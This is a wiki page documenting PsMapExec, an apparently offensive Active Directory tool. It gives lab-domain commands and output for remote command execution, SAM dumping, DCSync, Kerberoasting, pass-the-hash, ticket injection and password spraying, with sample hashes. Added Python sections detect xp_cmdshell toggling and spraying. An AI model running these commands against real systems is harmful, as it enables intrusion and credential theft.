
01 ‐ Methods

The-Viper-One edited this page Oct 14, 2025 · 16 revisions

Overview

In the context of PsMapExec, methods are the built-in functions that enable interaction with systems over specific protocols. Each method defines how PsMapExec performs a task: for instance, the SMB and WMI methods facilitate access checks and remote code execution using their respective protocols, the Spray method tells PsMapExec to conduct a credential spraying operation with the supplied arguments, and the LDAP method directs it to connect to a target LDAP server. PsMapExec supports a range of methods, each tailored for different types of operations. Refer to the sections below for details on how to use each one effectively.


> Command Execution Methods

The following methods support command execution and running modules on target systems:

  • MSSQL
  • SMB
  • WinRM
  • WMI

Note: The WMI and SMB methods will warn in the console if there are any issues performing remote cleanup and provide a manual remediation command.

Authentication Types

When -Command and -Module are omitted, PsMapExec will simply check the provided or current user credentials against the specified target systems for administrative access over the specified method.

# Current user
PsMapExec [Method] -Targets All

# With Password
PsMapExec [Method] -Targets All -Username [Username] -Password [Password]

# With Hash
PsMapExec [Method] -Targets All -Username [Username] -Hash [NTLM/RC4/AES256]

# With Ticket
PsMapExec [Method] -Targets All -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI and MSSQL only) (Password auth only)
PsMapExec WMI -Targets All -Username Administrator -Password Password -LocalAuth

Command Execution

All currently supported command execution methods support the -Command parameter. The command parameter can be appended to the above Authentication Types to execute given commands as a specified or current user.

PsMapExec [Method] -Targets [Targets] -Command "whoami"

PS > PsMapExec wmi -Targets all -Domain "sevenkingdoms.local, essos.local" -Command whoami

WMI   192.168.56.12   MEEREEN        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] ACCESS DENIED
WMI   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] SUCCESS
sevenkingdoms\moe

WMI   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
sevenkingdoms\moe

Module Execution

All currently supported command execution methods support the -Module parameter. The module parameter can be appended to the Authentication Types to execute given modules as a specified or current user.

# Syntax example
PsMapExec [Method] -Targets [Targets] -Module [Module]

PS > PsMapExec smb -Targets all -Module sam -ShowOutput -Domain "sevenkingdoms.local, essos.local"

SMB   192.168.56.23   BRAAVOS        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] ACCESS DENIED
SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] ACCESS DENIED
SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

SMB   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f94d37691e2275ee2541960677262f15:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::

 

 

> DCSync

Performs DCSync against the specified Domain Controller(s). Output is stored in $pwd\PME\DCSync\DCSync_Full_Dump unless a specific user is targeted, in which case the data is stored in $pwd\PME\DCSync\DCSync_User_Dump.

Primary Purpose: Remote DCSyncing and domain password analysis.

Usage

# Target a specific DC
PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -ShowOutput

# Target all DCs (Syncs all accounts, on all DCs, on all domains)(noisy as fuck)
PsMapExec dcsync -Targets DCs -Domain "sevenkingdoms.local, essos.local" -ShowOutput

 

Example Output

PS > PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -ShowOutput

DCSYNC   10.0.2.15   REDKEEP   SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard   [+] SUCCESS

NORTH$::aad3b435b51404eeaad3b435b51404ee:72a0db22de74fd97ac020696517ba98c:::
ESSOS$::aad3b435b51404eeaad3b435b51404ee:e71e8cb00ca7a2254f8fe204c710b8c0:::
krbtgt::aad3b435b51404eeaad3b435b51404ee:47ccccaecaa6f9ecdc7ce48b9c0342cf:::
Administrator::aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
DRAGONSTONE$::aad3b435b51404eeaad3b435b51404ee:0024da62a19d7635b03a65137de1bca2:::
CASTERLYROCK$::aad3b435b51404eeaad3b435b51404ee:5a20e2cf4caa7e42df6b532fff52e8c7:::
Evil_ICao$::aad3b435b51404eeaad3b435b51404ee:b1effe2f03bbd311da2ddb229e4359f6:::

Parsing Results

[*] Parsed NTDS files stored in C:\Users\moe\PME\DCSync\DCSync_Full_Dump

It is also possible to sync only a single user. When doing so, it is highly recommended to append the domain NetBIOS name to the username.

PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -option "dcsync:security\krbtgt" -ShowOutput

 

Example Output (Single User)

PS > PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -option "dcsync:security\krbtgt" -ShowOutput

DCSYNC   10.0.2.15   REDKEEP   SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard   [+] SUCCESS

< -- Snip -->

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/9/2025 9:05:30 PM
Object Security ID   : S-1-5-21-4056014253-3096967110-678733760-502
Object Relative ID   : 502

Credentials:
  Hash NtLm: 47ccccaecaa6f9ecdc7ce48b9c0342cf
    ntlm- 0: 47ccccaecaa6f9ecdc7ce48b9c0342cf
    lm  - 0: 0129ef7692056e177f0e668e266d16f2

< -- Snip -->

 

 

> GenRelayList / SMB Signing

PsMapExec supports SMB signing checks to determine which specified targets have signing enabled.

Output for systems which do not require SMB signing will be stored in $pwd\PME\SMB\SigningNotRequired.txt

Primary Purpose: Identification of systems for SMB signing status.

Usage

PsMapExec GenRelayList -Targets [Targets]

By default, the results are parsed and a list of hostnames is written to disk in the PME folder for all hosts which do not require signing.

Example Output

PS > PsMapExec GenRelayList -Targets All -Domain "Security.local, essos.local"

SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] REQUIRED
SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [+] REQUIRED
SMB   192.168.56.23   BRAAVOS        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] NOT REQUIRED
SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] REQUIRED
SMB   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] NOT REQUIRED

Success Count    : 3
Script Completed : 08:18:34
Elapsed Time     : 00:00:01.2651776

 

 

> Inject

Inject is a simple method used to inject a Kerberos ticket into memory. There are two primary reasons for using this method:

  • You do not have any Kerberos tickets already in memory, for example when working from a non-domain joined system
  • You wish to revert to different "credentials" after performing impersonation in PsMapExec

Primary Purpose: Changing current user context with various credential material (Rubeus ptt)

Usage

Ticket

A base64-encoded Kerberos ticket can be supplied to the -Ticket parameter, either directly on the command line or as a path to a file from which it is loaded.

PsMapExec Inject -Ticket "doIhsj..."
PsMapExec Inject -Ticket "C:\ticket.txt"

Username and Hash

A username and hash combination can also be provided for authentication. The following hashes are currently accepted:

  • RC4 / NT
  • NTLM
  • AES256 HMAC

PsMapExec Inject -Username [User] -Hash [Hash] -Domain [Domain]

 

Username and Password

A traditional username and password combination is also supported.

PsMapExec Inject -Username [User] -Password [Password] -Domain [Domain]

Example Output

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Moe @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:20:30 (local)
	End Time:   5/23/2025 18:20:30 (local)
	Renew Time: 5/30/2025 8:20:30 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 


PS C:\Users\moe> PsMapExec inject -Username administrator -Password Password123!!

[+] Ticket Successfuly Injected

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Administrator @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:21:08 (local)
	End Time:   5/23/2025 18:21:08 (local)
	Renew Time: 5/30/2025 8:21:08 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 

 

 

> IPMI

This method will attempt to dump hashes from vulnerable IPMI servers. By default, a built-in user list is used. Alternatively, a user list can be queried from the domain, or a single username can be tried against the IPMI server.

Successful hash output is written to $PWD\PME\IPMI

Primary Purpose: IPMI hash dumping.

Usage

Standard targeting using the built in user list

PsMapExec IPMI -Targets [Targets]

Using a list of domain users as a user list, targeting all domain joined systems

PsMapExec IPMI -Targets All -Option IPMI:DomainUsers

Using a single username for authentication

PsMapExec IPMI -Targets All -Option IPMI:admin

 

 

> Kerberoast

This method will connect to the targeted domain and perform kerberoasting on eligible accounts. It also supports targeted, single-user roasting where required. Depending on the encryption type retrieved, PsMapExec will store collected hashes in two separate files in a hashcat format ready for password cracking.

Primary Purpose: Kerberoasting

Output is stored in: $PWD\PME\Kerberoast

Optional Parameters

Parameter     Value             Description
---------     -----             -----------
-Domain       Domain            Set the domain to run against
-Option       Kerberoast:USER   Specify a single user to roast rather than all candidate users
-ShowOutput   N/A               Displays hash output to the console

 

Obtain all Kerberoastable users from target domain

PsMapExec kerberoast -Domain [Domain] -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -ShowOutput

[*] Found 2 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
EE167259FF905A8292B30C12904BE9DB07E3E43192662A141010E02CD4A5468C957E7C60617D8CD7B33059718E7204F2186504EB3D604AF95A613E80

< -- Snip -->

User          : dev_user_2
SPN           : cifs/9Dl1TKMroOy2EtLN.domain.com

$krb5tgs$23$*dev_user_2$dev.security.local$cifs/9Dl1TKMroOy2EtLN.domain.com*$265787A4D7A2BBCF9D56D378501C5458$515A080C96
3FCCCBE5DC5F5DAEB9A92BE35E55BFF9DFE9F594C5DF2053350A393E7D2FCA3A3F1AADBBCB0A9A0B10C2C15ABAD9A3BE55FD7E128C2E6B5E883ED9C9
5CF0D68B4E2C24D84DCF61117E80611E3D85FBD63B95E013EEF03F8D4220E28A3497613AE4ABFC81AB5BEF6BD42E18DC4295BA37B231DCAC2989BD6F

< -- Snip -->

 

Single user specification

PsMapExec Kerberoast -Option "Kerberoast:USER" -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -Option "Kerberoast:dev_user_1" -ShowOutput

[*] Found 1 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
8E405CEFCB72F37A4B3BCF5070F651A9E0F036EFC90C710082F655B826C69DAD6B6CD03E9CE580799162A13DE60346A3158241225705F9C34B7158F4

< -- Snip -->

 

 

> LDAP / LDAPS

This method is used for performing authentication to LDAP servers. Refer to the Modules page for in-depth usage on what can be executed on LDAP servers.

Primary Purpose: Authentication and LDAP based abuse vectors.

Usage

Note: Use "LDAP" for the method name when unencrypted LDAP connections to port 389 are required. Otherwise, it is recommended to use "LDAPS" to connect to port 636 for encrypted communications.

Simply check current user authentication to LDAP

# Check authentication with current user credentials
PsMapExec LDAP -Targets [Targets]

# Execute modules as current user
PsMapExec LDAP -Targets [Targets] -Module [Module]

# Check authentication with alternate credentials
PsMapExec LDAP -Targets [Targets] -Username [User] -Password [Password]

# Check authentication with alternate hash
PsMapExec LDAP -Targets [Targets] -Username [User] -Hash [Hash]

# Check authentication with alternate credentials (ticket) against all Domain Controllers over LDAPS
PsMapExec LDAPS -Targets DCs -Ticket "doIF+DCCBfSgAwIBBaEDA..."

 

 

> MSSQL

The MSSQL method will identify MSSQL servers within the targeted domain and attempt to authenticate to each one, either as the current user context or with provided local authentication credentials. Command execution is supported.

Primary Purpose: Command execution and access checking on MSSQL servers.

Usage

Authentication Types

The MSSQL method supports the following authentication types

# Current user
PsMapExec MSSQL -Targets [Targets]

# Local Authentication (Authenticates through SQL Server login)
PsMapExec MSSQL -Targets [All] -Username [User] -Password [Password] -LocalAuth

Where possible, successful authentication to an MSSQL instance will report which user you are authenticated as:

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username [email protected] -Password Password123

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS SEVENKINGDOMS\Moe

PsMapExec will also advise when you are operating in the context of a SYSADMIN.

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username sa -Password Password123 -LocalAuth

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS sa (SYSADMIN)

Command Execution

If you have sysadmin rights, you can supply the -Command or -Module parameter to PsMapExec. xp_cmdshell needs to be enabled to perform command execution. If it is not, PsMapExec will attempt to enable it and, after doing so, will revert xp_cmdshell to its original state.

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username sa -Password Password123 -LocalAuth -command whoami

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS sa (SYSADMIN)

north\sql_svc
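
The enable-then-revert behaviour described above leaves a pair of configuration-change messages in the SQL Server error log, which is what a defender can look for. The following is an added example, not PsMapExec code: the log lines are constructed and the 5-minute cut-off is an assumption.

```python
import re
from datetime import datetime, timedelta

# SQL Server writes this message to its error log on every sp_configure change.
CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+(?P<spid>\S+)\s+"
    r"Configuration option 'xp_cmdshell' changed from (?P<old>\d) to (?P<new>\d)\."
)


def xp_cmdshell_windows(lines, transient=timedelta(minutes=5)):
    """Pair each enable (0 -> 1) with the following revert (1 -> 0).

    A short-lived window is typical of tooling that enables xp_cmdshell,
    runs a command and restores the setting; a window with no revert means
    the option was left on. The 5-minute cut-off is an assumption.
    """
    windows, opened = [], None
    for line in lines:
        m = CHANGE.match(line)
        if not m or m["old"] == m["new"]:
            continue  # other options, or a no-op such as "from 0 to 0"
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        if m["new"] == "1":
            opened = opened or (ts, m["spid"])  # keep the first enable
        elif opened:
            windows.append({"enabled_at": opened[0], "reverted_at": ts,
                            "spid": opened[1],
                            "transient": ts - opened[0] <= transient})
            opened = None
    if opened:
        windows.append({"enabled_at": opened[0], "reverted_at": None,
                        "spid": opened[1], "transient": False})
    return windows


# Constructed error-log lines (timestamps and session ids are made up).
TAIL = " Run the RECONFIGURE statement to install."
SAMPLE_ERRORLOG = [
    "2025-10-14 08:18:33.90 spid55      Configuration option 'show advanced options' changed from 0 to 1." + TAIL,
    "2025-10-14 08:18:34.02 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1." + TAIL,
    "2025-10-14 08:18:36.40 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0." + TAIL,
    "2025-10-14 09:02:11.15 spid61      Configuration option 'xp_cmdshell' changed from 0 to 0." + TAIL,
    "2025-10-14 11:40:00.00 spid70      Configuration option 'xp_cmdshell' changed from 0 to 1." + TAIL,
]

if __name__ == "__main__":
    for w in xp_cmdshell_windows(SAMPLE_ERRORLOG):
        state = "transient" if w["transient"] else "left enabled or long-lived"
        print(w["enabled_at"], "->", w["reverted_at"], w["spid"], state)
```
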

Impersonation

PsMapExec supports impersonation through MSSQL. This is handled via the -Impersonate parameter.

  • -Impersonate enumerate -> Enumerate the authenticating user's impersonation rights

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username [email protected] -Password Password123 -Impersonate enumerate

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS SEVENKINGDOMS\Moe

IMPERSONATION RIGHTS

Login             CanImpersonate      State  ID
-----             --------------      -----  --
SEVENKINGDOMS\Moe sa                  GRANT   1
SEVENKINGDOMS\Moe NORTH\brandon.stark GRANT 269

The name of a user to impersonate can also be provided. If the impersonated account has SYSADMIN privileges, then command execution is also supported.

  • -Impersonate sa -> Impersonate the given user account

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username [email protected] -Password Password123 -Impersonate sa -Command whoami

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS sa (SYSADMIN)

north\sql_svc

 

 

> RDP

Performs authentication against RDP services on selected targets.

Primary Purpose: Authentication verification of targets

Note: Hash and Ticket authentication are not supported for this method.

Usage

# Domain Authentication
PsMapExec RDP -Targets [Targets] -Domain [Domain] -Username [User] -Password [Password]

# Local Authentication
PsMapExec RDP -Targets [Targets] -Domain [Domain] -Username [User] -Password [Password] -LocalAuth

Example Output

PS > psmapexec RDP -Targets all -Domain "sevenkingdoms.local, north.sevenkingdoms.local" -Username [email protected] -Password Password123

RDP   192.168.56.22   CASTELBLACK    north.sevenkingdoms.local   Windows Server 2019 Datacenter Evaluation   [*] CREDSSP ERROR
RDP   192.168.56.11   WINTERFELL     north.sevenkingdoms.local   Windows Server 2019 Datacenter Evaluation   [-] ACCESS DENIED
RDP   192.168.56.21   THE-EYRIE      sevenkingdoms.local         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
RDP   192.168.56.10   KINGSLANDING   sevenkingdoms.local         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

 

 

> SMBv1

Performs a simple packet level check against the specified hosts to determine if SMBv1 is enabled.

Output for systems which do not require SMB signing will be stored in $pwd\PME\SMB\SMBv1\SigningNotRequired.txt

Primary Purpose: Identification of systems for SMBv1 status

Usage

PsMapExec SMBv1 -Targets [Targets] -Domain [Domain]

By default, the results are parsed and a list of FQDNs is written to disk in the PME folder for all hosts which have SMBv1 enabled.

Example Output

PS > PsMapExec SMBv1 -Targets all -Domain "sevenkingdoms.local, essos.local, north.sevenkingdoms.local"

SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL                 Windows Server 2016 Standard Evaluation     [-] SMBv1 ENABLED
SMB   192.168.56.11   WINTERFELL     NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SMBv1 DISABLED
SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SMBv1 DISABLED
SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL         Windows Server 2019 Standard                [+] SMBv1 DISABLED

 

 

> Spray

The spray method offers various credential spraying techniques. PsMapExec is designed to respect the domain's default account lockout threshold, helping to prevent user lockouts. However, it does not account for fine-grained password policies (FGPPs). It’s recommended to verify whether FGPPs are in use within the environment, as they could lead to unintended account lockouts during spraying.

Note: Successfully sprayed users are excluded from future spraying attempts in order to reduce unnecessary risk of lockout and requests to the Domain Controller.

Primary Purpose: Account validation through credential spraying

Usage

Targets

When using the Spray method, the -Targets parameter is used to specify which accounts to perform password spraying on. If -Targets is not specified, all enabled user accounts for the targeted or current domain will be sprayed against.

Other values for -Targets are supported, as shown below:

PsMapExec Spray -Domain Security.local                           # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "All"            # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "C:\Users.txt"   # Sprays users from list (SamAccountNames)
PsMapExec Spray -Domain Security.local -Targets "AdminCount=1"   # Sprays targets which have the attribute AdminCount=1
PsMapExec Spray -Domain Security.local -Targets "Group Name"     # Sprays members of group

Hash

Hash authentication supports NT, LM:NT and AES256 hashes

PsMapExec Spray -SprayHash [RC4]
PsMapExec Spray -SprayHash [AES256]
PsMapExec Spray -SprayHash [LM:NT]

Password

PsMapExec Spray -SprayPassword [Password]

AccountAsPassword

Sets the password to the username value.

PsMapExec Spray -AccountAsPassword

EmptyPassword

Authentication attempts are performed with empty password values.

PsMapExec Spray -EmptyPassword

Pre2k

Sprays for Pre2k computer accounts.

PsMapExec Spray -Pre2k

SuccessOnly

Displays only successful authentication attempts. This is recommended in large domains, as a large number of console writes significantly hinders the speed of PowerShell.

PsMapExec Spray -SprayPassword [Password] -SuccessOnly

Example Output

PS > PsMapExec spray -domain sevenkingdoms.local -SprayPassword Password123

 - Targeted Domain    : sevenkingdoms.local
 - Lockout Threshold  : 5
 - Safety Limit value : 4

[*] Spraying with password value: Password123

[*] cersei.lannister          -> Limit
[*] lord.varys                -> Limit
[*] tyron.lannister           -> Limit
[*] robert.baratheon          -> Limit
[*] renly.baratheon           -> Limit
[*] jaime.lannister           -> Limit
[*] tywin.lannister           -> Limit
[*] stannis.baratheon         -> Limit
[*] maester.pycelle           -> Limit
[*] joffrey.baratheon         -> Limit
[+] low_priv_2                -> Success
[+] admin_2                   -> Success
[+] Moe                       -> Success
[*] robin.arryn               -> Limit
[+] low_priv                  -> Success
[-] lysa.arryn                -> Failure
[*] Administrator             -> Limit
[*] vagrant                   -> Limit
[*] petyer.baelish            -> Limit


[*] Successful accounts in target domain sevenkingdoms.local

[+] sevenkingdoms.local\low_priv_2
[+] sevenkingdoms.local\admin_2
[+] sevenkingdoms.local\Moe
[+] sevenkingdoms.local\low_priv

[*] Output written to C:\Users\moe\Desktop\PME\Spraying
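
Because a spray like the one above stays under the lockout threshold, no account lockout is raised; on the monitoring side the signal is one source failing logons for many distinct accounts, a few tries each. The following detection sketch is an added example, not part of PsMapExec: the record layout, thresholds, addresses and sample records are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def detect_spray(records, window=timedelta(minutes=10), min_accounts=5, max_tries=2):
    """Flag sources that fail logons for many accounts, a few tries each.

    records: iterable of (timestamp, source, account, success) tuples, for
    example built from forwarded logon events. The thresholds are assumptions
    to tune per environment. Counting distinct accounts per source is the
    point: no single account accumulates enough failures to lock out.
    """
    by_source = defaultdict(list)
    for ts, source, account, success in records:
        by_source[source].append((ts, account, success))

    findings = []
    for source, events in sorted(by_source.items()):
        events.sort()
        best, start = None, 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            fails, hits = defaultdict(int), set()
            for _, account, success in events[start:end + 1]:
                if success:
                    hits.add(account)
                else:
                    fails[account] += 1
            if len(fails) < min_accounts or max(fails.values()) > max_tries:
                continue
            if best is None or len(fails) + len(hits) > best["size"]:
                best = {
                    "source": source,
                    "first_seen": events[start][0],
                    "failed_accounts": sorted(fails),
                    # Logons that succeeded inside the burst: reset these first.
                    "succeeded_accounts": sorted(hits),
                    "size": len(fails) + len(hits),
                }
        if best:
            findings.append(best)
    return findings


def sample_records():
    """Constructed records; account names and addresses are made up."""
    t0 = datetime(2025, 10, 14, 8, 18, 0)
    users = ["cersei.lannister", "lord.varys", "jaime.lannister", "lysa.arryn",
             "robin.arryn", "tywin.lannister", "low_priv", "admin_2"]
    worked = {"low_priv", "admin_2"}
    recs = [(t0 + timedelta(seconds=i), "10.0.2.50", u, u in worked)
            for i, u in enumerate(users)]
    # A user mistyping their own password: several failures, one account.
    recs += [(t0 + timedelta(seconds=30 * i), "10.0.2.77", "robert.baratheon", False)
             for i in range(3)]
    return recs


if __name__ == "__main__":
    for f in detect_spray(sample_records()):
        print(f["source"], len(f["failed_accounts"]), "accounts failed;",
              "succeeded:", f["succeeded_accounts"])
```
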

> VNC

This method simply performs a "no auth" check on any identified VNC servers.

Primary Purpose: Checks for "no auth" on VNC servers

Usage

# Check for VNC no auth on all systems in the domain
PsMapExec VNC -Targets [Targets] -Domain [Domain]

Example Output

PS > PsMapExec vnc -Targets ALL -Domain sevenkingdoms.local

VNC   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] AUTH NOT REQUIRED
VNC   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] AUTH REQUIRED
VNC   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] AUTH REQUIRED
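
The GenRelayList, SMBv1 and VNC methods all print the same column layout, but the [+]/[-] marker does not mean the same thing in each, so a remediation list has to be keyed on the status text. The parser below is an added example, not part of PsMapExec; it reuses result rows from the example outputs on this page, and the finding and remediation wording is an assumption.

```python
import re

# One result row: METHOD, IP, HOST, DOMAIN, OS, "[mark] STATUS"; columns split by 2+ spaces.
ROW = re.compile(
    r"^(?P<method>[A-Z0-9]+)\s{2,}(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s{2,}"
    r"(?P<host>\S+)\s{2,}(?P<domain>\S+)\s{2,}(?P<os>.+?)\s{2,}"
    r"\[(?P<mark>[+*-])\]\s(?P<status>.+?)\s*$"
)

# Keyed on (method, status): "[+]" marks "signing required" for SMB but
# "no authentication needed" for VNC, so the marker alone is ambiguous.
WEAK = {
    ("SMB", "NOT REQUIRED"): ("SMB signing not required", "require signing on the SMB server"),
    ("SMB", "SMBv1 ENABLED"): ("SMBv1 enabled", "disable the SMBv1 protocol"),
    ("VNC", "AUTH NOT REQUIRED"): ("VNC accepts unauthenticated sessions", "configure VNC authentication"),
}


def parse_rows(text):
    """Return every result row as a dict; prompts, summaries and command output are skipped."""
    return [m.groupdict() for m in (ROW.match(l.rstrip()) for l in text.splitlines()) if m]


def remediation_list(text):
    """Group weak settings per host FQDN as (finding, remediation) pairs."""
    todo = {}
    for row in parse_rows(text):
        hit = WEAK.get((row["method"], row["status"]))
        if hit:
            fqdn = f'{row["host"]}.{row["domain"]}'.lower()
            entry = todo.setdefault(fqdn, {"ip": row["ip"], "os": row["os"], "findings": []})
            entry["findings"].append(hit)
    return todo


# Rows copied from the example outputs on this page (GenRelayList, SMBv1, VNC).
SAMPLE_OUTPUT = """\
PS > PsMapExec GenRelayList -Targets All -Domain "Security.local, essos.local"
SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] REQUIRED
SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [+] REQUIRED
SMB   192.168.56.23   BRAAVOS        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] NOT REQUIRED
SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] REQUIRED
SMB   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] NOT REQUIRED
Success Count    : 3
SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL                 Windows Server 2016 Standard Evaluation     [-] SMBv1 ENABLED
SMB   192.168.56.11   WINTERFELL     NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SMBv1 DISABLED
SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SMBv1 DISABLED
SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL         Windows Server 2019 Standard                [+] SMBv1 DISABLED
VNC   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] AUTH NOT REQUIRED
VNC   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] AUTH REQUIRED
VNC   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] AUTH REQUIRED
"""

if __name__ == "__main__":
    for fqdn, entry in sorted(remediation_list(SAMPLE_OUTPUT).items()):
        for finding, fix in entry["findings"]:
            print(f'{fqdn} ({entry["ip"]}): {finding} -> {fix}')
```
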